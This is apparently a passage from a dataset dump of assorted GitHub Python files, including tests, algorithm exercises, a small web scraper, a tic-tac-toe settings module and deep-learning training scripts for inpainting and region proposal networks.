'text/html'},\n mime_type=\"text/html\",\n expected_template=\"resource_view.html\")\n\n def test_attribute_view(self):\n self.login_new_user()\n self.publish_nanopub(data=self.turtle,\n content_type=\"text/turtle\")\n\n content = self.get_view(uri=\"http://example.com/janedoe\",\n view=\"attributes\",\n mime_type=\"application/json\")\n\n json_content = json.loads(str(content.data, 'utf8'))\n self.assertEquals(json_content['label'], \"Jane Doe\")\n self.assertEquals(len(json_content['type']), 1)\n self.assertEquals(json_content['type'][0]['label'], 'Person')\n\n def test_ontology_describe_view(self):\n self.login_new_user()\n ontology = \"\"\"\n .\n \"Professor\";\n \"Jane Doe\" ;\n \"(425) 123-4567\" ;\n ;\n . \"\"\"\n\n self.publish_nanopub(data=ontology,\n content_type=\"text/turtle\")\n\n content = self.get_view(uri=\"http://example.com/\",\n view=\"describe\",\n mime_type=\"application/json\",\n expected_template=\"describe_ontology.json\")\n\n data = json.loads(str(content.data, 'utf8'))\n self.assertIsInstance(data, list, \"'describe' view returned unexpected structure\")\n self.assertTrue(data, \"'describe' view returned empty list\")\n self.assertIn(\"@graph\", data[0], \"'describe' view missing @graph key\")\n self.assertIn(\"@id\", data[0], \"'describe' view missing @id key for graph\")\n\n graph = data[0][\"@graph\"]\n self.assertEqual(len(graph), 2, \"'describe' view returned the wrong number of subjects\")\n\n for subject in graph:\n if subject[\"@id\"] == \"http://example.com/\":\n self.assertEqual(len(subject.keys()), 2,\n \"Subject in 'describe' view has unexpected number of predicates\")\n self.assertIn(\"http://www.w3.org/2002/07/owl#Ontology\", subject[\"@type\"],\n \"Expected an ontology type object in the 'describe' view\")\n elif subject[\"@id\"] == \"http://example.com/janedoe\":\n self.assertEqual(len(subject.keys()), 6,\n \"Subject in 'describe' view has unexpected number of predicates\")\n","repo_name":"mobilemadman2/whyis","sub_path":"tests/api/test_nanopubs.py","file_name":"test_nanopubs.py","file_ext":"py","file_size_in_byte":6658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"34246775828","text":"# The change in airline revenues from baggage fees, from 2013 to 2014\nimport requests\nfrom lxml import html\n# Note that the BTS provides CSV versions of each year\n# So using HTML parsing is the dumb way to do this. oh well\nBASE_URL = 'https://www.rita.dot.gov/bts/sites/rita.dot.gov.bts/files/subject_areas/airline_information/baggage_fees/html/%s.html'\nyear_totes = {2013: 0, 2014: 0}\n\nfor yr in year_totes.keys():\n url = BASE_URL % yr\n resp = requests.get(url)\n doc = html.fromstring(resp.text)\n # Incredibly sloppy way of getting the total value from\n # the bottom-right cell of the table. oh well\n tval = doc.cssselect('tr td')[-1].text_content().strip()\n year_totes[yr] = int(tval.replace(',', '')) * 1000 # it's in 000s\n\nprint(year_totes[2014] - year_totes[2013])\n# 179236000\n","repo_name":"stanfordjournalism/search-script-scrape","sub_path":"scripts/79.py","file_name":"79.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":1228,"dataset":"github-code","pt":"48"} +{"seq_id":"31081697555","text":"class TrieNode:\n def __init__(self):\n self.children = {}\n self.end = False\n self.words = []\nclass Trie:\n def __init__(self):\n self.node = TrieNode()\n \n def insert(self,word):\n cur = self.node\n for char in word:\n if char not in cur.children:\n cur.children[char] = TrieNode()\n cur = cur.children[char]\n cur.end = True\n cur.words.append(word)\n \n def get(self,word):\n if word[0] not in self.node.children:\n return word\n \n cur = self.node\n for char in word:\n if char not in cur.children:\n break\n if cur.end:\n break\n cur = cur.children[char]\n \n if cur.end:\n return cur.words[0]\n return word\n \nclass Solution:\n def replaceWords(self, dictionary: List[str], sentence: str) -> str:\n sent = sentence.split()\n\n\n t = Trie()\n for word in dictionary:\n t.insert(word) \n \n ans = [] \n for word in sent:\n ans.append(t.get(word))\n \n return ' '.join(ans)\n ","repo_name":"Merwan-J/competetive-programming","sub_path":"648-replace-words/648-replace-words.py","file_name":"648-replace-words.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22922478393","text":"import json\nimport os\n\n\nSETTINGS_FILE_PATH = \"./game_settings.json\"\nDEFAULT_SETTINGS = {\n \"num_rows\": 3,\n \"num_columns\": 3,\n \"win_target\": 3,\n \"player_name_1\": \"Rick\",\n \"player_name_2\": \"Morty\",\n}\n\n\ndef load_settings(file_path):\n settings_file_exists = os.path.exists(file_path) and os.path.isfile(file_path)\n if settings_file_exists:\n try:\n with open(file_path, \"r\") as file_pointer:\n settings = json.load(file_pointer)\n if (\n int(settings[\"num_rows\"]) == settings[\"num_rows\"]\n and int(settings[\"num_columns\"]) == settings[\"num_columns\"]\n and int(settings[\"win_target\"]) == settings[\"win_target\"]\n and str(settings[\"player_name_1\"]) == str(settings[\"player_name_1\"])\n and str(settings[\"player_name_2\"]) == str(settings[\"player_name_2\"])\n ):\n num_rows = settings[\"num_rows\"]\n num_columns = settings[\"num_columns\"]\n\n if not (\n 2 <= num_rows <= 20\n and 2 <= num_columns <= 20\n and settings[\"win_target\"] <= max(num_rows, num_columns)\n ):\n raise Exception(\"Invalid board configuration\")\n\n return settings\n except Exception:\n pass\n\n return DEFAULT_SETTINGS\n\n\ndef save_settings(file_path, settings):\n try:\n with open(file_path, \"w\") as file_pointer:\n json.dump(settings, file_pointer)\n except Exception:\n print(traceback.format_exc())\n","repo_name":"arelimdz/tictactoe-cli","sub_path":"src/settings_file_io.py","file_name":"settings_file_io.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32542190019","text":"# Tom Croshaw - Project 1\n# Problem 1 - PYTHON 3\n# For this problem you will be writing a function that the supplied dictionary input_dict and operates on it.\n\nimport string\n\ninput_dict = {'list':[1,2,3,4], 'tuple':('cat', 'dog'), 'integer':1,\n 'float':99.99, 1:'integer', 2:'integer_2', 'Uppercase_string':'ABCD',\n 'CHARACTER':'C'}\n\nvowels = 'aeiou'\nconsonents = string.ascii_lowercase\n\ndef modify_dict(dict):\n print ('Input Dictionary: ',input_dict)\n dict_new = {}\n # Iterate through the keys\n for key in dict:\n key = str(key)\n # For pairs where the key starts with a lowercase vowel, change the value to \"vowel\".\n if key[0].lower() in vowels:\n dict_new[key] = \"vowel\"\n # For pairs where the key starts with a lowercase consonant, change the value to \"consonant\".\n elif key[0].lower() in consonents and key[0].lower() not in vowels:\n dict_new[key] = \"consonents\"\n # else return nothing\n else:\n None\n print ('Output Dictionary: ',dict_new)\n return dict_new\n\nassert (modify_dict(input_dict))\n","repo_name":"Indu4191/Data_sci","sub_path":"Project1_uploads/Tom/project-1.1.py","file_name":"project-1.1.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"20450443796","text":"N = int(input())\r\ncost = [list(map(int,input().split())) for _ in range(N)]\r\n\r\ndef find(visited,now):\r\n if dp[visited][now]: return dp[visited][now]\r\n if visited == (1< 0 else 10**9\r\n \r\n tmp = 10**8\r\n for i in range(1,N):\r\n if (not (visited >> i) % 2) and cost[now][i]:\r\n tmp = min(tmp, find(visited | (1<50:\n if int(Id) in Roll_present:\n pass\n else:\n Roll_present.append(int(Id))\n else:\n Id = \"Unknown\" \n\n # Put text describe who is in the picture\n cv2.rectangle(im, (x-22,y-90), (x+w+22, y-22), (0,255,0), -1)\n cv2.putText(im, str(Id), (x,y-40), font, 1, (255,255,255), 3)\n cv2.imshow('Cam----Press q to quit',im)\n\n # Display the video frame with the bounded rectangle\n \n\n # If 'q' is pressed, close program\n if cv2.waitKey(10) & 0xFF == ord('q'):\n break\n\n # Stop the camera\n cam.stop()\n\n # Close all windows\n cv2.destroyAllWindows()\n\n return Roll_present","repo_name":"shohan-cse/Face-Recognition-Based-Attendance-System","sub_path":"web_app/take_attendance.py","file_name":"take_attendance.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"73513771664","text":"import time\ndef selection_sort(arr):\n start = time.time()\n n = len(arr)\n \n for i in range(n-1):\n # Assume the current element is the minimum\n min_index = i\n \n # Find the minimum element in the remaining unsorted part\n for j in range(i+1, n):\n if arr[j] < arr[min_index]:\n min_index = j\n \n # Swap the minimum element with the current element\n arr[i], arr[min_index] = arr[min_index], arr[i]\n end = time.time()\n time_taken = end-start\n print(\"Total time taken to execute: \",time_taken)\n# Example usage:\narr = [5, 3, 8, 4, 2]\nselection_sort(arr)\nprint(arr)\n","repo_name":"mohan87927/DS-with-Python-Programs","sub_path":"selection_sort_algo.py","file_name":"selection_sort_algo.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43357851641","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\n\nfrom models import Generator, Discriminator\nfrom loss_functions import _l1_loss, _generator_adversarial_loss, _generator_least_squares_loss\nfrom loss_functions import _discriminator_adversarial_loss, _discriminator_least_squares_loss, tv_loss, style_loss\nfrom options import Options as opt\nfrom utils import get_optimizer, extract_features, gram_matrix, sample_noise\n\n\nclass InpaintingModel:\n def __init__(self, is_train: bool = True, device: torch.device = torch.device('cpu'),\n dtype: torch.dtype = torch.float32):\n self.isTrain = is_train\n self.device = device\n self.dtype = dtype\n self.input = None\n self.masks = None\n self.masked_input = None\n self.masked_input_with_mask = None\n self.generated_images = None\n self.loss_D = None\n self.loss_D_real = None\n self.loss_D_fake = None\n self.loss_G = None\n self.loss_style = None\n self.loss_tv = None\n self.net_G = Generator(input_nc=4, output_nc=3, levels=5, u_net=True).to(self.device)\n\n if self.isTrain:\n self.net_D = Discriminator(input_nc=3).to(self.device).to(self.dtype)\n self.optimizer_G = get_optimizer(model=self.net_G, lr=opt.g_lr, beta1=opt.g_beta1)\n self.optimizer_D = get_optimizer(model=self.net_D, lr=opt.d_lr, beta1=opt.d_beta1)\n\n if opt.use_style:\n self.style_cnn = torchvision.models.vgg13_bn(pretrained=True).features\n self.style_cnn.to(self.dtype).to(self.device)\n self._set_requires_grad(self.style_cnn, True)\n\n def set_input(self, input: torch.Tensor, masks: torch.Tensor):\n self.masks = masks.to(self.device)\n self.input = input.to(self.device).to(self.dtype)\n self.masked_input = self.masks * self.input + (~self.masks) * sample_noise(self.input.size(),\n self.dtype, self.device)\n self.masked_input_with_mask = torch.cat([self.masked_input, self.masks], dim=1)\n\n def forward(self):\n self.generated_images = self.net_G(self.masked_input_with_mask) # G(A)\n return self.generated_images\n\n def backward_D(self):\n pred_fake = self.net_D(self.generated_images.detach())\n pred_real = self.net_D(self.input)\n self.loss_D, self.loss_D_real, self.loss_D_fake = self.discriminator_loss(pred_real, pred_fake)\n self.loss_D.backward()\n\n def backward_G(self):\n pred_fake = self.net_D(self.generated_images)\n self.loss_G = self.generator_loss(pred_fake, self.input, self.generated_images)\n self.loss_G.backward()\n\n def compute_style_loss(self):\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n input = normalize((self.input + 1) / 2)\n feats = extract_features(input, self.style_cnn)\n style_targets = []\n for idx in opt.style_layers:\n style_targets.append(gram_matrix(feats[idx].clone()))\n generated = normalize((self.generated_images + 1) / 2)\n feats = extract_features(generated, self.style_cnn)\n s_loss = style_loss(feats, opt.style_layers, style_targets, opt.style_weights)\n t_loss = tv_loss(self.generated_images, opt.tv_weight)\n self.loss_style = s_loss\n self.loss_tv = t_loss\n return self.loss_style + self.loss_tv\n\n def generator_loss(self, scores_fake, input_to_generator, output_to_generator):\n if opt.ls_gan_mode:\n gan_loss = _generator_least_squares_loss(scores_fake)\n else:\n gan_loss = _generator_adversarial_loss(scores_fake, self.device)\n\n loss = (1 - opt.l1_weight) * gan_loss + opt.l1_weight * _l1_loss(input_to_generator, output_to_generator)\n if opt.use_style:\n loss += self.compute_style_loss()\n return loss\n\n def discriminator_loss(self, scores_real, scores_fake):\n if opt.ls_gan_mode:\n return _discriminator_least_squares_loss(scores_real, scores_fake)\n return _discriminator_adversarial_loss(scores_real, scores_fake, self.device)\n\n def optimize_parameters(self):\n self.forward() # compute fake images: G(A)\n # update D\n self._set_requires_grad(self.net_D, True)\n self.optimizer_D.zero_grad()\n self.backward_D()\n self.optimizer_D.step()\n # update G\n self._set_requires_grad(self.net_D, False)\n self.optimizer_G.zero_grad()\n self.backward_G()\n self.optimizer_G.step()\n\n @staticmethod\n def _set_requires_grad(net, requires_grad=False):\n if net is not None:\n for param in net.parameters():\n param.requires_grad = requires_grad\n\n def eval(self):\n self.net_G.eval()\n if self.isTrain:\n self.net_D.eval()\n self.style_cnn.eval()\n\n def train(self):\n self.net_G.train()\n if self.isTrain:\n self.net_D.train()\n self.style_cnn.train()\n\n","repo_name":"Ella475/image-inpainting-using-gan","sub_path":"inpainting_model.py","file_name":"inpainting_model.py","file_ext":"py","file_size_in_byte":5177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35612730934","text":"from django.urls import path \nfrom . import views \nurlpatterns = [\n path('',views.Index,name='index'),\n path('deta/',views.Data,name='deta'),\n path('btn',views.Button,name='Button'),\n path('delete/',views.Delt,name='delete'),\n path('signup',views.signup,name=\"signup\"),\n path('login',views.login,name=\"login\"),\n path('logout',views.logout,name=\"logout\"),\n\n]\n","repo_name":"abhijithtp/To_Do_List","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6388347600","text":"import pytest\n\nfrom src.person import Person\n\n\n@pytest.mark.describe('Person tests:')\nclass TestPerson:\n\n @pytest.mark.it(\"Person set data ok\")\n def test_should_set_correct_data(self) -> None:\n name = 'Test Name'\n age = 15\n\n expected_dict = {\n 'name': name,\n 'age': age,\n }\n\n person = Person(name, age)\n\n assert person.name == 'Test'\n assert person.last_name == 'Name'\n assert person.age == age\n\n assert person.to_dict() == expected_dict\n\n assert str(person) == f'Name: {name} | Age: {age}'\n","repo_name":"gustavoSaboia97/test_studies","sub_path":"tests/unit/test_person.py","file_name":"test_person.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38260982210","text":"import random\n\n\nWORD_LIST = ['book', 'computer', 'phone', 'spiderman', 'plastic', 'cookies', 'lasagna', 'pizza', 'pasta', 'basketball',\n 'volleyball', 'wine', 'apple']\nINITIAL_GUESSES = 8 # Initial number of guesses player starts with\n\n\ndef play_game(secret_word):\n \"\"\"\n Add your code (remember to delete the \"pass\" below)\n \"\"\"\n word = ''\n for i in range (0, len(secret_word)):\n word = word+\"-\"\n return word\n\ndef get_word():\n \"\"\"\n This function returns a secret word that the player is trying\n to guess in the game. \n \"\"\"\n for word in WORD_LIST:\n words = word.strip()\n\n my_list = []\n my_list.append(words)\n secret_word = random.choice(my_list)\n return secret_word\n\n\n\ndef main():\n \"\"\"\n To play the game, we first select the secret word for the\n player to guess and then play the game using that secret word.\n \"\"\"\n secret_word = get_word()\n dashes = play_game(secret_word)\n length = len(secret_word)\n n = 0\n print('The word now looks like this: ' + str(dashes))\n print('You have ' + str(INITIAL_GUESSES) + ' guesses left')\n while secret_word != dashes:\n letter = input(\"Please guess a single letter: \")\n for i in range(0, length):\n if letter == secret_word[i]:\n dashes = dashes[:i] + letter + dashes[i + 1:]\n if \"-\" not in dashes:\n print(\"Congratulations. The word is: \" + str(secret_word))\n break\n if letter.isalpha() and len(letter) == 1:\n if letter in secret_word:\n print(\"That guess is correct. The word is now \" + dashes)\n if letter not in secret_word and len(letter) == 1:\n n = n + 1\n print(\"There are no \" + str(letter) + \"'s in this word\")\n print(\"The word is now \" + dashes)\n print(\"You have \" + str(INITIAL_GUESSES - n) + \" guesses left.\")\n if n == INITIAL_GUESSES and secret_word == dashes:\n print(\"Congratulations.The word is: \" + str(secret_word))\n break\n if n == INITIAL_GUESSES:\n print(\"Sorry you lost. The secret word was \" + str(secret_word))\n\n# This provided line is required at the end of a Python file\n# to call the main() function.\nif __name__ == \"__main__\":\n main()\n","repo_name":"cavmp/200DaysofCode","sub_path":"Day25-WordGuess.py","file_name":"Day25-WordGuess.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7159255933","text":"# https://www.acmicpc.net/problem/17472\nfrom collections import deque\nmove = [(1,0), (-1,0), (0,1), (0,-1)]\nN, M = map(int, input().split()) # 세로, 가로\ngraph = [list(map(int, input().split())) for _ in range(N)]\n\ndef findGroup(i,j):\n for k in range(len(groupList)):\n for node in groupList[k]:\n if node[0] == i and node[1] == j:\n return k\n\ndef dfs(y,x, mode, cost): # 같은 그룹인지 체크하는 로직\n if graph[y][x] == 1: # 종료조건\n if cost == 1 or cost == 2:\n return None\n elif cost >= 3:\n return cost - 1, findGroup(y,x)\n \n dy, dx = move[mode]\n ny = dy + y\n nx = dx + x\n \n if N > ny >=0 and M > nx >=0:\n return dfs(ny,nx, mode, cost + 1)\n \n return None\n\ndef bfs(i,j):\n group = []\n queue = deque()\n if not visited[i][j] and graph[i][j] == 1:\n queue.append([i,j])\n group.append([i,j])\n visited[i][j] = True\n while queue:\n y , x = queue.popleft()\n for dy, dx in move:\n ny = dy + y\n nx = dx + x\n if N > ny >=0 and M > nx >=0 and not visited[ny][nx] and graph[ny][nx] == 1:\n visited[ny][nx] = True\n queue.append([ny,nx])\n group.append([ny,nx])\n\n return group\n else:\n return None\n \ndef getParent(v1, parent):\n if v1 != parent[v1]:\n parent[v1] = getParent(parent[v1], parent)\n return parent[v1]\n \ndef union(v1,v2, parent):\n a = getParent(v1, parent)\n b = getParent(v2, parent)\n \n if a > b: # 더 작은 노드를 parent값을 선정한다.\n parent[a] = b\n else:\n parent[b] = a\n \ngroupList = []\nvisited = [[False for _ in range(M)] for _ in range(N)]\nfor i in range(N):\n for j in range(M):\n result = bfs(i,j)\n if result != None:\n groupList.append(result)\n \nnodegraph = []\nfor k in range(len(groupList)):\n for node in groupList[k]:\n y, x = node\n for i in range(4): # 가로,세로를 돌려본다\n result = dfs(y,x,i, 0)\n if result != None:\n nodegraph.append((result[0],k,result[1])) # cost, 시작, 종료\n \nnodegraph.sort()\nparent = [v1 for v1 in range(len(groupList))] # 자기자신을 부모노드로 초기화\nresult = 0\ncounter = 0\nfor cost, start, end in nodegraph:\n if getParent(start, parent) != getParent(end, parent):\n union(start, end, parent)\n result += cost\n counter += 1\n \nif counter == len(groupList)-1: # 노드-1 의 개수와 간선의 개수가 같으면 최소신장트리 조건\n print(result)\nelse:\n print(-1)","repo_name":"rhkdguskim/Study","sub_path":"알고리즘/이것이코딩테스트다스터디/탐색/dfs/다리만들기 2.py","file_name":"다리만들기 2.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40875455004","text":"\nfrom random import random, uniform, choice\n\n\nfrom py_classes.epsilon_greedy_class import Creative\n\nCreative.reset_ads()\n\nad_1 = Creative('puppies', random(), uniform(1,10))\nad_2 = Creative('cats', random(), uniform(1,10))\nad_3 = Creative('elephants', random(), uniform(1,10))\nad_4 = Creative('bears', random(), uniform(1,10))\nad_5 = Creative('rhinos', random(), uniform(1,10))\n# ad_5 = Creative('sports', .2, 10)\n\n\nad_1.rate = random()\nad_1.reward = uniform(1,10)\nad_2.rate = random()\nad_2.reward = uniform(1,10)\nad_3.rate = random()\nad_3.reward = uniform(1,10)\nad_4.rate = random()\nad_4.reward = uniform(1,10)\n\n# Creative.history.head(20)\n#\n# Creative.history.tail()\n\n\nCreative.simulate_n(epsilon=0.7, n_steps=500)\n\nCreative.history[['eg_rev', 'rand_rev']].sum(axis=0)\n\nimport plotly.express as px\n\nrunning_total = Creative.history[['eg_rev', 'rand_rev']].cumsum()\n\nx = running_total.stack().reset_index().rename({'level_0':'step', 'level_1':'type', 0:'Running Total'}, axis=1)\n\npx.line(x, x='step', y=\"Running Total\", color='type')\n\n\n\nfor i in range(100):\n ad = Creative.epsilon_greedy(.5)\n if ad.get_reward() > 0:\n print(f\"{ad.name}: Yay! Making Money\")\n else:\n print(f\"{ad.name}: ... bust\")\n\nad_1.Q\nad_2.Q\nad_3.Q\nad_4.Q\nad_5.Q\n\nad_1.reward\nad_2.reward\nad_3.reward\nad_4.reward\nad_5.reward\n\n\n\nad_1.calc_rate()\n\nad_1.calc_Q()\nad_1.displays\nad_2.displays\nad_3.displays\nad_4.displays\n\nx = [1,2,3]\ny = ['a', 'b', 'c']\n\nfor n, l in enumerate(zip(x,y)):\n print(f'{n}: {l}')\n\n\nx = 1\n\nx += 1 if not True else 0\nx\nx += 1 if not False else 0\nx\n\n\nimport pandas as pd\nx = pd.DataFrame(columns=['eg_pick', 'ran_pick', 'eg_rev', 'rand_rev'], index=[0], data=[[0,0,0,0]])\n\nstep = 1\nx.loc[1,'eg_pick'] = 1\nx.loc[1,'ran_pick'] = 2\nx\n\nx.index.max()\n","repo_name":"Hersh-E/MAB-ADS-Example","sub_path":"scratchpad/MAB_test.py","file_name":"MAB_test.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73897359187","text":"'''\nCreated on Jun 18, 2013\n\n@author: Yubin Bai\n\nAll rights reserved.\n'''\n\nimport time\nfrom multiprocessing.pool import Pool\nfrom itertools import compress\nparallelSolve = False\nINF = 1 << 32\n\ndef solve(par):\n n, m, c, amp, ops = par\n status = [0] * n\n currMax = 0\n for o in ops:\n status[o - 1] += 1\n s = sum(compress(amp, status))\n if s > c:\n return 'Blown'\n currMax = max(currMax, s)\n status[o - 1] %= 2\n return 'Secure, max is %d' % currMax\n \n \nclass Solver:\n def getInput(self):\n self.numOfTests = 0\n self.input = []\n while True:\n n, m, c = map(int, self.fIn.readline().strip().split())\n if n == 0:\n break\n self.numOfTests += 1\n amp = []\n for i in range(n):\n amp.append(int(self.fIn.readline()))\n ops = []\n for i in range(m):\n ops.append(int(self.fIn.readline()))\n self.input.append((n, m, c, amp, ops))\n \n def __init__(self):\n self.fIn = open('input.txt')\n self.fOut = open('output.txt', 'w')\n self.results = []\n \n def parallel(self):\n self.getInput()\n p = Pool(4)\n millis1 = int(round(time.time() * 1000))\n self.results = p.map(solve, self.input)\n millis2 = int(round(time.time() * 1000))\n print(\"Time in milliseconds: %d \" % (millis2 - millis1))\n self.makeOutput()\n\n def sequential(self):\n self.getInput()\n millis1 = int(round(time.time() * 1000))\n for i in self.input:\n self.results.append(solve(i))\n millis2 = int(round(time.time() * 1000))\n print(\"Time in milliseconds: %d \" % (millis2 - millis1))\n self.makeOutput()\n\n def makeOutput(self):\n for test in range(self.numOfTests):\n self.fOut.write(\"Case #%d: %s\\n\" % (test + 1, self.results[test]))\n self.fIn.close()\n self.fOut.close()\n \nif __name__ == '__main__':\n solver = Solver()\n if parallelSolve:\n solver.parallel()\n else:\n solver.sequential()\n \n","repo_name":"yubinbai/pcuva-problems","sub_path":"UVa 661 - Blowing Fuses/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"48"} +{"seq_id":"69980657426","text":"import os\nimport sys\nimport PIL\nimport pickle\nimport json\nimport numpy as np\nfrom tqdm import tqdm\nfrom math import log, exp\nfrom random import shuffle\nfrom skimage.transform import resize\nfrom IPython.display import Image, display\nfrom PIL import ImageEnhance, ImageFont, ImageDraw\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.python.keras.utils.data_utils import Sequence\nfrom tensorflow.keras.layers import Layer\n\n\nimport img_aug\nimport data_gen\nfrom data_gen import create_ytrue_train, generate_anchor_boxes, preprocess_anchor_boxes\n\ndef get_val_data(pickle_file, json_file):\n with open(pickle_file, 'rb') as f:\n imgs_dict = pickle.load(f)\n data_dict = {}\n for imgid in imgs_dict:\n data_dict[imgid] = []\n with open(json_file, 'r') as f:\n annotations_dict = json.load(f)\n annotations_list = annotations_dict['annotations']\n for annotation in annotations_list:\n try:\n img_id = annotation['image_id']\n imwidth = imgs_dict[img_id][1]\n imheight = imgs_dict[img_id][2]\n c = annotation['category_id'] # TODO: make sure that category ids start from 1, not 0. Need to set back_ground as another category\n boxleft,boxtop,boxwidth,boxheight = annotation['bbox']\n box_cenx = boxleft + boxwidth/2.\n box_ceny = boxtop + boxheight/2.\n x,y,w,h = box_cenx/imwidth, box_ceny/imheight, boxwidth/imwidth, boxheight/imheight\n data_dict[img_id].append( [c,x,y,w,h] )\n except KeyError:\n continue\n anchor_boxes = generate_anchor_boxes(480,480,16,scale = [64,128,256], no_exceed_bound = True)\n x, y = [], []\n for img_id, labels in data_dict.items():\n x.append( imgs_dict[img_id][0])\n y.append( create_ytrue_train( imgs_dict[img_id][0], np.array(labels),anchor_boxes, iou_upper=0.7, iou_lower = 0.3 ))\n return np.array(x), np.array(y)\n\ndef rpn_regr_loss(ytrue, ypred):\n #y_labels are in the shape [bs, i*j*9, 6]\n mask = tf.where(ytrue != 0, 1., 0.)\n ypred = tf.math.multiply(mask,ypred)\n return keras.losses.Huber()(ytrue,ypred)\n\ndef rpn_class_loss(ytrue, ypred):\n cl = tf.reduce_all(ytrue == 0, axis = 2)\n cl2 = tf.stack((cl,cl), axis=-1)\n ypred = tf.where(cl2, 0., ypred)\n return keras.losses.BinaryCrossentropy()(ytrue, ypred)\n\nimg_pickle = r'D:\\Til data\\images.p'\n#val_img_pickle = r'/content/images_val.p'\n#save_model_folder = r'/content/'\njson_annotation = r'D:\\Til data\\train.json'\n#val_annotation = r'/content/val.json'\nbs = 16\nn_epochs_warmup = 100\nn_epochs_after = 100\n#train_x, train_y = get_val_data(img_pickle, json_annotation)\n#print(train_x.shape)\n#print(train_y.shape)\ninput_shape = (480,480,3)\n#save_model_path = os.path.join( save_model_folder, 'rpn_model.h5' )\n\n#Transfers VGG16 layer until last convolutional layer\n#model = tf.keras.applications.VGG19(include_top = False, input_shape = (480,480,3))\n\n#model_2 = tf.keras.models.Sequential(name=\"VGG16\")\n#for layer in model.layers[:-1]:\n# model_2.add(layer)\n#for layer in model_2.layers:\n# layer.trainable = False\n\n#inputs = keras.Input(shape = input_shape)\n#x = model_2(inputs)\n#x = layers.Conv2D(512, 3, padding=\"same\")(x)\n#object_classification = layers.Conv2D(18, 1, padding=\"same\")(x)\n#object_classification = layers.Reshape((8100, 2))(object_classification)\n#object_classification = layers.Softmax(axis=-1, name=\"c\")(object_classification)\n#bbox_regression = layers.Conv2D(36, 1, padding=\"same\")(x)\n#bbox_regression = layers.Reshape((8100,4), name=\"r\")(bbox_regression)\n#rpn = keras.Model(inputs, outputs=[object_classification, bbox_regression], name=\"test_model\")\n#rpn.compile(optimizer=tf.keras.optimizers.Adam(0.001),\n# loss={\"c\":rpn_class_loss, \"r\":rpn_regr_loss},\n# loss_weights={\"c\" : 1./256, \"r\" : 4*1./900},\n# metrics=[tf.keras.metrics.RootMeanSquaredError()])\n\n#rpn.summary()\n\n#model_plot = tf.keras.utils.plot_model(rpn, to_file =\"d:\\\\programming\\\\python\\\\dsta cv\\\\model3.png\",show_shapes=True)\n#model_img_f = \"d:\\\\programming\\\\python\\\\dsta cv\\\\model.png\"\n#keras.utils.plot_model(model, to_file=model_img_f, show_shapes=True)\n\n#TRAINING\n#file_path = r\"D:\\Til data\\rpn_model.h5\"\n#rpn = tf.keras.models.load_model(file_path, custom_objects={'custom_loss':custom_loss})\n#for layer in rpn.layers:\n# layer.trainable = True\n#rpn.compile(optimizer=tf.keras.optimizers.Adam(0.0001),\n# loss=custom_loss,\n# metrics=[tf.keras.metrics.RootMeanSquaredError()])\n\n#rpn.summary()\n\n#val_x, val_y = get_val_data(img_pickle, json_annotation)\n#print(val_x.shape)\n#print(val_y.shape)\n#with open(r\"D:\\Til data\\rpn_train_x.p\", \"wb\") as f:\n# pickle.dump(val_x,f)\n\n#with open(r\"D:\\Til data\\rpn_train_y.p\", \"wb\") as f:\n# pickle.dump(val_y,f)\n\n\n\n\nwith open(r\"D:\\Til data\\rpn_train_x.p\", \"rb\") as f:\n val_x = pickle.load(f)\n\nwith open(r\"D:\\Til data\\rpn_train_y.p\", \"rb\") as f:\n val_y = pickle.load(f)\n\nclass_y = val_y[:,:,:2]\nregr_y = val_y[:,:,2:]\n\nmodel_checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(\n filepath=r\"D:\\Til data\\rpn\\rpn_best.h5\",\n save_weights_only=False,\n monitor='val_loss',\n mode='auto',\n save_best_only=True)\nearlystopping = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=15)\nreduce_lr = tf.keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=7, min_lr=1e-8)\n\n\n\nrpn.fit(x=val_x,\n y={\"c\" : class_y, \"r\" : regr_y},\n batch_size=1,\n epochs=n_epochs_warmup, \n validation_split = 0.2,\n callbacks=[earlystopping, model_checkpoint_callback, reduce_lr],\n verbose = 1)\n\ndel rpn\nrpn = tf.keras.models.load_model(r\"D:\\Til data\\rpn\\rpn_best.h5\", custom_objects = {\"rpn_class_loss\":rpn_class_loss,\"rpn_regr_loss\":rpn_regr_loss})\nfor layer in rpn.get_layer('VGG16').layers:\n layer.trainable = True\nrpn.summary()\n\nrpn.compile(optimizer=tf.keras.optimizers.Adam(0.00001),\n 